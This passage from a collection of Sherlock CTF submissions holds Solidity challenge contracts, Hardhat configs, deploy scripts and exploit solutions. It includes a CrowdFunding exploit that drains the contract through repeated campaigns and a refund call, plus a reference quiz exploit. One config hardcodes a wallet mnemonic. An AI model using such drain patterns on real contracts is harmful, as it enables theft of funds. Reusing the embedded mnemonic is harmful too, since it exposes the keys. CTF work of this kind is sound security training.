"hardhat": "^2.8.3" 26 | }, 27 | "dependencies": { 28 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 29 | "@openzeppelin/contracts": "^4.5.0", 30 | "dotenv": "^14.3.2" 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /kuldeep23907/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("Challenge", await setup.instance()); 15 | const sloganContract = await ctf.sloganContract(); 16 | console.log("Deployed ctf to", ctf.address); 17 | 18 | // wait for etherscan to index 19 | await sleep(300); 20 | 21 | // verify 22 | await hre.run("verify:verify", { 23 | address: setup.address, 24 | }); 25 | await hre.run("verify:verify", { 26 | address: ctf.address, 27 | constructorArguments: [sloganContract], 28 | }); 29 | } 30 | 31 | main() 32 | .then(() => process.exit(0)) 33 | .catch((error) => { 34 | console.error(error); 35 | process.exit(1); 36 | }); 37 | -------------------------------------------------------------------------------- /kuldeep23907/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt("Challenge", await setup.instance()); 9 | 10 | console.log("solved:", await setup.isSolved()); 11 | 12 | const exp = await EXPLOIT.deploy(ctf.address); 13 | 14 | console.log("solved:", await setup.isSolved()); 15 | } 16 | 17 | main() 18 | .then(() => process.exit(0)) 19 | .catch((error) => { 20 | console.error(error); 21 | process.exit(1); 22 | }); 23 | -------------------------------------------------------------------------------- /lucyoa/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /lucyoa/README.md: -------------------------------------------------------------------------------- 1 | # Sherlock Challenge 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | Challenge.sol | [0x4C9bf01acEA21DDC7Ca25d49d301B8bDd63c1966](https://goerli.etherscan.io/address/0x4C9bf01acEA21DDC7Ca25d49d301B8bDd63c1966) | 6 | | Setup.sol | [0xe95dF719Fc223CD8E57bA9bAAb8E86bEDF3e5d69](https://goerli.etherscan.io/address/0xe95dF719Fc223CD8E57bA9bAAb8E86bEDF3e5d69) | 7 | 8 | -------------------------------------------------------------------------------- /lucyoa/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.0; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /lucyoa/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.0; 2 | 3 | import "./ISetup.sol"; 4 | import "./Challenge.sol"; 5 | 6 | 7 | contract Setup is ISetup { 8 | Challenge public instance; 9 | 10 | constructor() payable { 11 | instance = new Challenge(); 12 | 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | address govToken = instance.govTokens(0); 18 | return GovToken(govToken).balanceOf(address(instance)) == 0; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /lucyoa/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | 10 | module.exports = { 11 | solidity: "0.8.0", 12 | etherscan: { 13 | apiKey: ETHERSCAN_API, 14 | }, 15 | networks: { 16 | goerli: { 17 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 18 | gasPrice: 900000000000, 19 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 20 | }, 21 | }, 22 | }; 23 | -------------------------------------------------------------------------------- /lucyoa/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.5", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.4", 9 | "hardhat": "^2.8.4" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.1", 13 | "@openzeppelin/contracts": "^4.0.0", 14 | "@openzeppelin/test-helpers": "^0.5.15", 15 | "dotenv": "^16.0.0", 16 | "openzeppelin-test-helpers": "^0.5.1" 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /luksgrin/README.md: -------------------------------------------------------------------------------- 1 | # CTF Submission: Haunted Dungeon 2 | 3 | Welcome to the **Haunted Dungeon**. 4 | Will you be able to conquer its treasure or will you perish? 5 | 6 | The Haunted Dungeon is a "turn-based" RPG with 5 floors. The 6th floor is the treasure room. 7 | There is a store with power up items and each floor is guarded by a monster. 8 | There's a limited amount of times one can enter the store in a floor. 9 | The monster's health and attack are pseudo-random. 10 | Pay close attention to the contract's log, since it displays in-game messages. 11 | 12 | Some items purely icnrease your stats while others may increase some stats while decreasing others... 13 | 14 | The CTF is deemed as completed once you conquer all floors and claim the treasure! 15 | 16 | Have fun! 17 | 18 | 19 | | Contract | Goerli | 20 | |--------------------| ---------------------------------------------------------------------------------------------------------------------------- | 21 | | HauntedDungeon.sol | [0x137A5B4bB53A62BD1Db46e563b89D1884afaC0Ac](https://goerli.etherscan.io/address/0x137A5B4bB53A62BD1Db46e563b89D1884afaC0Ac) | 22 | | Setup.sol | [0x9bdcf71048dfd8ef1c03a7ae3ede79f04a096b7f](https://goerli.etherscan.io/address/0x9bdcf71048dfd8ef1c03a7ae3ede79f04a096b7f) | 23 | 24 | `.env` file 25 | 26 | ``` 27 | ETHERSCAN_API= 28 | ALCHEMY_API_KEY_GOERLI= 29 | PRIVATE_KEY= 30 | ``` 31 | -------------------------------------------------------------------------------- /luksgrin/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /luksgrin/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './HauntedDungeon.sol'; 5 | 6 | contract Setup is ISetup { 7 | HauntedDungeon public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 9 ether); 11 | 12 | instance = new HauntedDungeon{value: 9 ether}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return instance.treasure() == 0; 18 | } 19 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/README.md: -------------------------------------------------------------------------------- 1 | # Example CTF submission 2 | 3 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | ExampleQuizExploit.sol | [0xA0331995c8Af192294A6e0E81E4D12e9C651ed57](https://goerli.etherscan.io/address/0xA0331995c8Af192294A6e0E81E4D12e9C651ed57) | 8 | | Setup.sol | [0x9715B922a7ee51b4572C8EDC76251783409A8fa6](https://goerli.etherscan.io/address/0x9715B922a7ee51b4572C8EDC76251783409A8fa6) | 9 | 10 | `.env` file 11 | 12 | ``` 13 | ETHERSCAN_API= 14 | ALCHEMY_API_KEY_GOERLI= 15 | PRIVATE_KEY= 16 | ``` 17 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/ExampleQuizExploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | contract ExampleQuizExploit { 4 | // Private number, will not be public at all ;) 5 | uint8 private constant answer = 4; 6 | 7 | constructor() payable {} 8 | 9 | function guess(uint8 n) external payable { 10 | require(msg.value == 1 ether); 11 | 12 | if(n == answer) { 13 | // Send all ether to user 14 | (bool success, ) = msg.sender.call{ value: address(this).balance }(''); 15 | require(success, 'send fail'); 16 | } 17 | } 18 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ExampleQuizExploit.sol'; 4 | 5 | contract Exploit { 6 | constructor(ExampleQuizExploit instance) payable { 7 | require(msg.value == 1 ether); 8 | instance.guess{value: 1 ether}(4); 9 | } 10 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './ExampleQuizExploit.sol'; 5 | 6 | contract Setup is ISetup { 7 | ExampleQuizExploit public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 1 ether); 11 | 12 | instance = new ExampleQuizExploit{value: 1 ether}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return address(instance).balance == 0; 18 | } 19 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "ExampleQuizExploit", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt( 9 | "ExampleQuizExploit", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("1") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /mhchia/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /mhchia/README.md: -------------------------------------------------------------------------------- 1 | # CrowdFunding CTF 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | CrowdFunding.sol | [0xc2c83168e3bf85a5deabf25f9f9873085c201c79](https://goerli.etherscan.io/address/0xc2c83168e3bf85a5deabf25f9f9873085c201c79) | 7 | | Setup.sol | [0x6c06959586640de3bcde69bdcebf2efda5d3983b](https://goerli.etherscan.io/address/0x6c06959586640de3bcde69bdcebf2efda5d3983b) | 8 | -------------------------------------------------------------------------------- /mhchia/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './CrowdFunding.sol'; 4 | 5 | contract Exploit { 6 | address owner; 7 | CrowdFunding instance; 8 | constructor(address _instance) payable { 9 | owner = msg.sender; 10 | instance = CrowdFunding(_instance); 11 | } 12 | 13 | function finalize() external payable { 14 | require(msg.sender == owner, "not owner"); 15 | require(msg.value >= 2 wei, "cheap"); 16 | uint256 k = msg.value; 17 | for (uint256 i = 0; i < k; i++) { 18 | instance.startCampaign{value: 1 wei}(); 19 | } 20 | instance.stopCampaign{value: 0 wei}(k - 1); 21 | instance.getRefund{value: 1 wei}(k - 1, 0); 22 | } 23 | 24 | receive() external payable { 25 | 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /mhchia/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /mhchia/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './CrowdFunding.sol'; 5 | 6 | contract Setup is ISetup { 7 | CrowdFunding public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 1 wei); 11 | 12 | instance = new CrowdFunding{value: 1 wei}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return address(instance).balance == 0; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /mhchia/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /mhchia/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /mhchia/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "CrowdFunding", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /mhchia/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt( 9 | "CrowdFunding", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("2") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /naps62/.eslintignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | 3 | -------------------------------------------------------------------------------- /naps62/.eslintrc.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | extends: ['plugin:prettier/recommended'], 3 | plugins: ['prettier'], 4 | parserOptions: { 5 | ecmaVersion: 2018, 6 | }, 7 | rules: { 8 | 'prettier/prettier': 'error', 9 | }, 10 | }; 11 | -------------------------------------------------------------------------------- /naps62/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | 3 | npm-debug.log* 4 | yarn-debug.log* 5 | yarn-error.log* 6 | artifacts/ 7 | cache/ 8 | typechain-types/ 9 | docs/ 10 | .openzeppelin/ 11 | deployments/localhost 12 | node_modules/ 13 | -------------------------------------------------------------------------------- /naps62/.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "plugins": ["prettier-plugin-solidity"], 3 | "overrides": [ 4 | { 5 | "files": "*.js", 6 | "options": { 7 | "tabWidth": 2, 8 | "singleQuote": true, 9 | "useTabs": false, 10 | "trailingComma": "all", 11 | "semi": true 12 | } 13 | }, 14 | { 15 | "files": "*.sol", 16 | "options": { 17 | "tabWidth": 4, 18 | "printWidth": 200 19 | } 20 | } 21 | ] 22 | } 23 | -------------------------------------------------------------------------------- /naps62/.projections.json: -------------------------------------------------------------------------------- 1 | { 2 | "contracts/*.sol": { "alternate": "test/contracts/{}.ts" }, 3 | "test/contracts/*.ts": { "alternate": "contracts/{}.sol" }, 4 | "scripts/*.ts": { "alternate": "test/scripts/{}.ts" }, 5 | "test/scripts/*.ts": { "alternate": "scripts/{}.ts" } 6 | } 7 | -------------------------------------------------------------------------------- /naps62/.solhint.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "solhint:default", 3 | "rules": { 4 | "line-length": false 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /naps62/.solhintignore: -------------------------------------------------------------------------------- 1 | contracts/math/BancorFormula.sol 2 | contracts/math/Power.sol 3 | -------------------------------------------------------------------------------- /naps62/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Subvisual LDA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /naps62/README.md: -------------------------------------------------------------------------------- 1 | # Secureum CARE-X Sherlock 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | ExampleQuizExploit.sol | [0xA1BCb047E9dc4aCcB36c14288239f9283DF3E68e](https://goerli.etherscan.io/address/0xA1BCb047E9dc4aCcB36c14288239f9283DF3E68e) | 6 | | Setup.sol | [0x4742FD1862E94dc74AeD62A96B6374E68e658f80](https://goerli.etherscan.io/address/0x4742FD1862E94dc74AeD62A96B6374E68e658f80) | 7 | 8 | 9 | * CTF requirements: https://github.com/sherlock-protocol/sherlock-ctf-0x0 10 | * CTF example: https://github.com/sherlock-protocol/sherlock-ctf-example 11 | * Inspiration: https://github.com/blockthreat/blocksec-ctfs 12 | -------------------------------------------------------------------------------- /naps62/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: None 2 | pragma solidity 0.7.2; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /naps62/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: None 2 | pragma solidity 0.7.2; 3 | 4 | import "./ISetup.sol"; 5 | import "./BuiltByANoob.sol"; 6 | 7 | contract Setup is ISetup { 8 | BuiltByANoob public instance; 9 | 10 | address originalOwner; 11 | 12 | constructor() { 13 | originalOwner = msg.sender; 14 | instance = new BuiltByANoob(); 15 | emit Deployed(address(instance)); 16 | } 17 | 18 | function isSolved() external view override(ISetup) returns (bool) { 19 | return instance.won(); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /naps62/deploy/deploy.ts: -------------------------------------------------------------------------------- 1 | import { ethers } from "hardhat"; 2 | 3 | import type { HardhatRuntimeEnvironment } from "hardhat/types"; 4 | import type { DeployFunction, Deployment } from "hardhat-deploy/types"; 5 | 6 | const func: DeployFunction = async function (env) { 7 | const { deploy } = env.deployments; 8 | const { deployer } = await env.getNamedAccounts(); 9 | 10 | await deploy("Setup", { from: deployer, log: true }); 11 | }; 12 | 13 | export default func; 14 | -------------------------------------------------------------------------------- /naps62/deployments/goerli/.chainId: -------------------------------------------------------------------------------- 1 | 5 -------------------------------------------------------------------------------- /naps62/hardhat.config.ts: -------------------------------------------------------------------------------- 1 | import { task } from "hardhat/config"; 2 | 3 | import "@typechain/hardhat"; 4 | import "@nomiclabs/hardhat-ethers"; 5 | import "@nomiclabs/hardhat-web3"; 6 | import "@nomiclabs/hardhat-waffle"; 7 | import "hardhat-gas-reporter"; 8 | import "hardhat-deploy"; 9 | import "@nomiclabs/hardhat-etherscan"; 10 | 11 | import type { HardhatUserConfig } from "hardhat/config"; 12 | 13 | task("accounts", "Prints the list of accounts", async (args, hre) => { 14 | const accounts = await hre.ethers.getSigners(); 15 | 16 | for (const account of accounts) { 17 | console.log(account.address); 18 | } 19 | }); 20 | 21 | const devMnemonic = 22 | "core tornado motion pigeon kiss dish differ asthma much ritual black foil"; 23 | 24 | const config: HardhatUserConfig = { 25 | solidity: { 26 | version: "0.7.2", 27 | settings: { 28 | optimizer: { 29 | enabled: true, 30 | runs: 20, 31 | }, 32 | }, 33 | }, 34 | networks: { 35 | hardhat: { 36 | accounts: { 37 | mnemonic: devMnemonic, 38 | }, 39 | }, 40 | goerli: { 41 | url: process.env.GOERLI_ENDPOINT, 42 | accounts: { 43 | mnemonic: devMnemonic, 44 | }, 45 | }, 46 | }, 47 | gasReporter: { 48 | enabled: process.env.REPORT_GAS ? true : false, 49 | gasPrice: 100, 50 | currency: "EUR", 51 | }, 52 | namedAccounts: { 53 | deployer: 0, 54 | }, 55 | etherscan: { 56 | apiKey: { 57 | goerli: process.env.ETHERSCAN_API_KEY, 58 | }, 59 | }, 60 | }; 61 | 62 | export default config; 63 | -------------------------------------------------------------------------------- /naps62/test/example.ts: -------------------------------------------------------------------------------- 1 | import { ethers } from "hardhat"; 2 | import { expect } from "chai"; 3 | 4 | import type { ContractFactory } from "ethers"; 5 | import type { SignerWithAddress } from "@nomiclabs/hardhat-ethers/signers"; 6 | import type { Setup, Exploit, BuiltByANoob } from "../typechain-types"; 7 | 8 | const { parseUnits } = ethers.utils; 9 | 10 | describe("Example", () => { 11 | let owner: SignerWithAddress; 12 | let alice: SignerWithAddress; 13 | let bob: SignerWithAddress; 14 | 15 | let Exploit: ContractFactory; 16 | let setup: Setup; 17 | let exploit: Exploit; 18 | let victim: BuiltByANoob; 19 | 20 | beforeEach(async () => { 21 | [owner, alice, bob] = await ethers.getSigners(); 22 | 23 | let Setup = await ethers.getContractFactory("Setup"); 24 | Exploit = await ethers.getContractFactory("Exploit"); 25 | 26 | setup = (await Setup.deploy()) as Setup; 27 | 28 | const [deployLog] = await ethers.provider.getLogs({ 29 | address: setup.address, 30 | }); 31 | 32 | const [victimAddress] = ethers.utils.defaultAbiCoder.decode( 33 | ["address"], 34 | deployLog.data 35 | ); 36 | 37 | victim = (await ethers.getContractAt( 38 | "BuiltByANoob", 39 | victimAddress, 40 | owner 41 | )) as BuiltByANoob; 42 | }); 43 | 44 | it("works", async () => { 45 | await Exploit.deploy(victim.address); 46 | 47 | expect(await setup.isSolved()).to.eq(true); 48 | }); 49 | }); 50 | -------------------------------------------------------------------------------- /naps62/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es2018", 4 | "module": "commonjs", 5 | "strict": true, 6 | "esModuleInterop": true, 7 | "resolveJsonModule": true, 8 | "allowJs": true, 9 | "skipLibCheck": true, 10 | "forceConsistentCasingInFileNames": true, 11 | "noEmit": true, 12 | "moduleResolution": "node", 13 | "isolatedModules": true, 14 | "outDir": "dist", 15 | "baseUrl": ".", 16 | "paths": { 17 | "@root/*": ["./*"] 18 | } 19 | }, 20 | "include": [ 21 | "./scripts", 22 | "./test", 23 | "./typechain", 24 | "./deploy" 25 | ], 26 | "files": [ 27 | "./hardhat.config.ts" 28 | ], 29 | } 30 | -------------------------------------------------------------------------------- /plotchy/.gitattributes: -------------------------------------------------------------------------------- 1 | *.sol linguist-language=Solidity 2 | *.vy linguist-language=Python 3 | -------------------------------------------------------------------------------- /plotchy/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | .env 3 | .history 4 | .hypothesis/ 5 | build/ 6 | reports/ 7 | .ods# -------------------------------------------------------------------------------- /plotchy/HouseOfMirrorsCallMap.ods: 